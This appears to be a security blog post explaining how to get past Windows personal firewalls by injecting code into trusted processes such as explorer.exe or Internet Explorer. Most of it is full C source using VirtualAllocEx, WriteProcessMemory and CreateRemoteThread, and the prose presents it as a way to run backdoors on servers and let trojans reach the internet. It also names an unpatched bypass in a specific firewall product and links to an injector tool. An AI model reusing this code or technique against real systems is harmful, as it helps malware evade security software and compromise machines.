3 Jan
How Bypass firewall with Process Injection
Hello Friends .
First question is why Process Injection ?
in this method we can attach evil Process to permitted Process . as you know , firewalls Permit to some Process , like : Internet explorer [IE] or Firefox or windows update or … . this Processes can connect to Internet very well [ often ] .
Process injection , Dll injection , “PE injection “ are methods to bypass firewalls [This Methods called as : Leak Firewall ] .
in dll injection , we injects dll into an application process area, and references to his own malicious DLL to make firewall believes that it’s the application which is using the DLL .
Today when we talk about injection, we are talking about a DLL that is loaded into a running process’s memory. as we know Windows is now designed for this, and injection techniques can be used by any application. Some applications use it to add features to a closed-source program [for example : Babylon Dictionary is One of them ] .
I,m not intend to talk about these [dll ,process Injection ] at this time . and i just want talk about Process injection [ or hijack] to bypass firewalls .
Attention To modeling :
Principle of application run [default ] :
when inclusion of a dynamic library [dll] :
inserting malicious code in the process of confidence :
Used internet Explorer [trusted Software ] for injection :
The following illustration shows the general Code injection with windows API method [virtualAllocEX(),..]
how to Inject Process : [with C cod ]
for firewall bypass we have 4 part :
- Open one process “P”
- Allocate memory remotely in “P” space
- Copy the code to remote process
- Create a thread to execute the code remotely
[will happen]
Example Of Process Injection In EXPLORER.EXE [code ]:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 | #pragma comment(lib,"Shlwapi.lib") #pragma comment(lib,"ADVAPI32.LIB") #include <stdio.h> #include <windows.h> #include <Shlwapi.h> #include <tlhelp32.h> #define INJECT_EXE "explorer.exe" typedef struct _RPar { DWORD dwDeleteFile; DWORD dwSleep; DWORD dwMessageBox; char Filename[1024]; char string1[1024]; char string2[1024]; } RPar; DWORD __stdcall ThreadProc(RPar *Para) { FARPROC PDeleteFile = (FARPROC)Para->dwDeleteFile; FARPROC PSleep = (FARPROC)Para->dwSleep; FARPROC PMessageBox = (FARPROC)Para->dwMessageBox; PMessageBox(NULL,Para->string1,Para->string2,MB_OK); while(PDeleteFile(Para->Filename) == 0) {PSleep(1000);} return 0; } int _stdcall WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nCmdShow) { DWORD dwThreadId,pID=0,dwThreadSize=2048; void *pRemoteThread; char ExeFile[1024]; HANDLE hProcess,hSnap; HINSTANCE hKernel, hUser; RPar my_RPar,*pmy_RPar; PROCESSENTRY32 pe32 = {0}; if( (hSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE ) return 3; pe32.dwSize = sizeof(PROCESSENTRY32); Process32First(hSnap, &pe32); do { if ( StrCmpNI(INJECT_EXE,pe32.szExeFile,strlen(INJECT_EXE)) == 0) { pID=pe32.th32ProcessID; break; } } while (Process32Next(hSnap,&pe32)); if ( hSnap != INVALID_HANDLE_VALUE ) CloseHandle(hSnap); hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID); pRemoteThread = VirtualAllocEx(hProcess, 0, dwThreadSize, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE); WriteProcessMemory(hProcess, pRemoteThread, &ThreadProc, dwThreadSize,0); ZeroMemory(&my_RPar,sizeof(RPar)); hKernel = LoadLibrary( "kernel32.dll"); my_RPar.dwDeleteFile = (DWORD)GetProcAddress(hKernel, "DeleteFileA"); my_RPar.dwSleep = (DWORD)GetProcAddress(hKernel, "Sleep"); hUser = LoadLibrary( "user32.dll"); my_RPar.dwMessageBox = (DWORD)GetProcAddress(hUser, "MessageBoxA"); GetModuleFileName(NULL,ExeFile,1024); printf (ExeFile); strcpy(my_RPar.Filename, ExeFile); strcpy(my_RPar.string1, "HI Abysssec"); strcpy(my_RPar.string2, "OK"); pmy_RPar =(RPar *)VirtualAllocEx (hProcess ,0,sizeof(RPar),MEM_COMMIT,PAGE_READWRITE); WriteProcessMemory(hProcess ,pmy_RPar,&my_RPar,sizeof my_RPar,0); CreateRemoteThread(hProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pmy_RPar,0,&dwThreadId); FreeLibrary(hKernel); CloseHandle(hProcess); system("tasklist"); return 0; } |
what Happens When Firewall bypass ?
in servers :
we can call "Internet explorer" or other trusted Application with [ASP.NET Execute Permission ] and run backdoor in any port .
with this method , we can telnet to open port of server without any worry .
In Client :
Backdoor , Trojans , bad software , connect to internet without Access .
Real Word [ Discovered By Abysssec ] test :
Vulnerability Firewall [Outpost 2009 ] :
http://www.agnitum.com/products/outpost/
You can Inject Process In IE7 or Mozilla Firefox [default Trusted ] .
[Sorry For more information , This bug is not fixed , You can test it with Process Injector tools ].
www.tarasco.org
[pinjector.exe] :
Download Link + source :
http://www.tarasco.org/security/pinjector/index.html
Final deduction:
1- We can Bypass some firewalls : Don't checked Allocated Memory in Trusted Process .
2- Dll , Process , PE injection is useful way to run Process without new Prosess ID [PID] .
In Future :
1- Usage Of these Method In other bypass Protections [hybrid or frees Protection ]
2 - PE INJECTION , why , what , where !?
More Information :
http://www.tarasco.org/security/pinjector/Win32.Design.Flaws.pdf
http://www.firewallleaktester.com/docs/leaktest.pdf
http://www.bluenotch.com/files/Shewmaker-DLL-Injection.pdf
--------------------------------------------------------------------------------------
Happy new year and holy days
god speed you
Daphne